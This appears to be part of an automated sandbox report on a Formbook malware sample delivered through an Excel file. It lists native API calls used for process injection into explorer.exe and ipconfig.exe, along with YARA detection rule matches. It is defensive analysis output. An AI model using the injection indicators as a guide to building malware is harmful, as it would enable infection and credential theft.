          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D01D4 NtSetValueKey,5_2_008D01D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D010C NtOpenDirectoryObject,5_2_008D010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1148 NtOpenThread,5_2_008D1148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF8CC NtWaitForSingleObject,5_2_008CF8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF938 NtWriteFile,5_2_008CF938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1930 NtSetContextThread,5_2_008D1930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAB8 NtQueryValueKey,5_2_008CFAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFA20 NtQueryInformationFile,5_2_008CFA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFA50 NtEnumerateValueKey,5_2_008CFA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFBE8 NtQueryVirtualMemory,5_2_008CFBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFB50 NtCreateKey,5_2_008CFB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC30 NtOpenProcess,5_2_008CFC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC48 NtSetInformationFile,5_2_008CFC48
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0C40 NtGetContextThread,5_2_008D0C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1D80 NtSuspendThread,5_2_008D1D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFD5C NtEnumerateKey,5_2_008CFD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFE24 NtWriteVirtualMemory,5_2_008CFE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFFFC NtCreateProcessEx,5_2_008CFFFC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFF34 NtQueueApcThread,5_2_008CFF34
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181C0 NtCreateFile,5_1_004181C0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418270 NtReadFile,5_1_00418270
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004182F0 NtClose,5_1_004182F0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183A0 NtAllocateVirtualMemory,5_1_004183A0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041817A NtCreateFile,5_1_0041817A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181BA NtCreateFile,5_1_004181BA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041826A NtReadFile,5_1_0041826A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B00C4 NtCreateFile,LdrInitializeThunk,7_2_020B00C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B07AC NtCreateMutant,LdrInitializeThunk,7_2_020B07AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_020AFAE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFB50 NtCreateKey,LdrInitializeThunk,7_2_020AFB50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_020AFB68
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_020AFBB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF900 NtReadFile,LdrInitializeThunk,7_2_020AF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF9F0 NtClose,LdrInitializeThunk,7_2_020AF9F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_020AFED0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFB4 NtCreateSection,LdrInitializeThunk,7_2_020AFFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_020AFC60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD8C NtDelayExecution,LdrInitializeThunk,7_2_020AFD8C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_020AFDC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0048 NtProtectVirtualMemory,7_2_020B0048
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0060 NtQuerySection,7_2_020B0060
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0078 NtResumeThread,7_2_020B0078
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B10D0 NtOpenProcessToken,7_2_020B10D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B010C NtOpenDirectoryObject,7_2_020B010C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1148 NtOpenThread,7_2_020B1148
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B01D4 NtSetValueKey,7_2_020B01D4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA20 NtQueryInformationFile,7_2_020AFA20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA50 NtEnumerateValueKey,7_2_020AFA50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAB8 NtQueryValueKey,7_2_020AFAB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAD0 NtAllocateVirtualMemory,7_2_020AFAD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBE8 NtQueryVirtualMemory,7_2_020AFBE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF8CC NtWaitForSingleObject,7_2_020AF8CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF938 NtWriteFile,7_2_020AF938
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1930 NtSetContextThread,7_2_020B1930
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFE24 NtWriteVirtualMemory,7_2_020AFE24
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFEA0 NtReadVirtualMemory,7_2_020AFEA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFF34 NtQueueApcThread,7_2_020AFF34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFFC NtCreateProcessEx,7_2_020AFFFC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC30 NtOpenProcess,7_2_020AFC30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC48 NtSetInformationFile,7_2_020AFC48
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0C40 NtGetContextThread,7_2_020B0C40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC90 NtUnmapViewOfSection,7_2_020AFC90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD5C NtEnumerateKey,7_2_020AFD5C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1D80 NtSuspendThread,7_2_020B1D80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981C0 NtCreateFile,7_2_000981C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098270 NtReadFile,7_2_00098270
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982F0 NtClose,7_2_000982F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009817A NtCreateFile,7_2_0009817A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981BA NtCreateFile,7_2_000981BA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009826A NtReadFile,7_2_0009826A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E4632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_01E4632E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_01E467C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E46332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_01E46332
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C2 NtQueryInformationProcess,7_2_01E467C2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403486
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004072724_2_00407272
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A9B4_2_00406A9B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A984_2_72E31A98
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8085_2_0041B808
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A2AA5_2_0041A2AA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BBA85_2_0041BBA8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C605_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD285_2_0041BD28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8E5_2_00402D8E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C7855_2_0041C785
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE0C65_2_008DE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090D0055_2_0090D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E30405_2_008E3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F905A5_2_008F905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D06D5_2_0095D06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE2E95_2_008DE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009812385_2_00981238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009863BF5_2_009863BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF3CF5_2_008DF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009063DB5_2_009063DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E23055_2_008E2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E73535_2_008E7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A37B5_2_0092A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F14895_2_008F1489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009154855_2_00915485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096443E5_2_0096443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D47D5_2_0091D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009605E35_2_009605E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC5F05_2_008FC5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E351F5_2_008E351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009265405_2_00926540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E46805_2_008E4680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE6C15_2_008EE6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A6345_2_0092A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009826225_2_00982622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096579A5_2_0096579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC7BC5_2_008EC7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009157C35_2_009157C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095F8C45_2_0095F8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097F8EE5_2_0097F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC85C5_2_008EC85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090286D5_2_0090286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098098E5_2_0098098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E29B25_2_008E29B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F69FE5_2_008F69FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009659555_2_00965955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096394B5_2_0096394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00993A835_2_00993A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098CBA45_2_0098CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096DBDA5_2_0096DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBD75_2_008DFBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00907B005_2_00907B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097FDDD5_2_0097FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910D3B5_2_00910D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008ECD5B5_2_008ECD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00912E2F5_2_00912E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FEE4C5_2_008FEE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097CFB15_2_0097CFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00952FDC5_2_00952FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F0F3F5_2_008F0F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090DF7C5_2_0090DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004010305_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A2AA5_1_0041A2AA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C7855_1_0041C785
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B8085_1_0041B808
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BBA85_1_0041BBA8
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C605_1_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BD285_1_0041BD28
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D8E5_1_00402D8E
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D905_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB05_1_00402FB0
          Source: C:\Windows\explorer.exeCode function: 6_2_029348F96_2_029348F9
          Source: C:\Windows\explorer.exeCode function: 6_2_029372FF6_2_029372FF
          Source: C:\Windows\explorer.exeCode function: 6_2_029390626_2_02939062
          Source: C:\Windows\explorer.exeCode function: 6_2_0293B5B26_2_0293B5B2
          Source: C:\Windows\explorer.exeCode function: 6_2_0293A7C76_2_0293A7C7
          Source: C:\Windows\explorer.exeCode function: 6_2_029349026_2_02934902
          Source: C:\Windows\explorer.exeCode function: 6_2_029373026_2_02937302
          Source: C:\Windows\explorer.exeCode function: 6_2_029353626_2_02935362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021612387_2_02161238
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BE2E97_2_020BE2E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C23057_2_020C2305
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C73537_2_020C7353
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0210A37B7_2_0210A37B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021663BF7_2_021663BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BF3CF7_2_020BF3CF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E63DB7_2_020E63DB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020ED0057_2_020ED005
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C30407_2_020C3040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D905A7_2_020D905A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0213D06D7_2_0213D06D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BE0C67_2_020BE0C6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0210A6347_2_0210A634
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021626227_2_02162622
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C46807_2_020C4680
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CE6C17_2_020CE6C1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214579A7_2_0214579A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CC7BC7_2_020CC7BC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F57C37_2_020F57C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214443E7_2_0214443E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020FD47D7_2_020FD47D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D14897_2_020D1489
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F54857_2_020F5485
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C351F7_2_020C351F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021065407_2_02106540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021405E37_2_021405E3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020DC5F07_2_020DC5F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02173A837_2_02173A83
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E7B007_2_020E7B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0216CBA47_2_0216CBA4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214DBDA7_2_0214DBDA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BFBD77_2_020BFBD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CC85C7_2_020CC85C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E286D7_2_020E286D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0213F8C47_2_0213F8C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215F8EE7_2_0215F8EE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021459557_2_02145955
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214394B7_2_0214394B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0216098E7_2_0216098E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C29B27_2_020C29B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D69FE7_2_020D69FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F2E2F7_2_020F2E2F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020DEE4C7_2_020DEE4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D0F3F7_2_020D0F3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020EDF7C7_2_020EDF7C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215CFB17_2_0215CFB1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02132FDC7_2_02132FDC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F0D3B7_2_020F0D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CCD5B7_2_020CCD5B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215FDDD7_2_0215FDDD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009A2AA7_2_0009A2AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C7857_2_0009C785
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C607_2_00088C60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D8E7_2_00082D8E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D907_2_00082D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082FB07_2_00082FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C77_2_01E467C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E450627_2_01E45062
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E413627_2_01E41362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E433027_2_01E43302
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E432FF7_2_01E432FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E475B27_2_01E475B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E409027_2_01E40902
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E408F97_2_01E408F9
          Source: QTN3C2AF414EDF9_041873.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 020BE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0212F970 appears 84 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02103F92 appears 132 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0210373B appears 245 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 020BDF5C appears 121 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00419F70 appears 40 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008DE2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0A0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00923F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008DDF5C appears 122 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0094F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092373B appears 245 times
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
